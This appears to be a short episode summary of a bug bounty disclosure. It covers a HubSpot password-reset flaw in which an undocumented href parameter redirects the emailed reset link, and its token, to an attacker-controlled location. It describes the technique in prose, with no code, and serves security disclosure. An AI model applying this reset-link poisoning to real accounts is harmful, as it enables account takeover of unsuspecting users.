HubSpot Full Account Takeover in Bug Bounty
Original Post:
We discussed this vulnerability during Episode 195 on 13 March 2023
A lot of wrong turns, eventually leading to some parameter brute forcing and the discovery of an href
param when submitting a Forgot Password request. The href
value would be used to craft the forgot password link with the actual token appended to it that is reflected in the Forgot Password email. If any victim were to click the link in the email (which originates legitimately from HubSpot) they’d be taken to an attacker controlled location revealing the token to the attacker.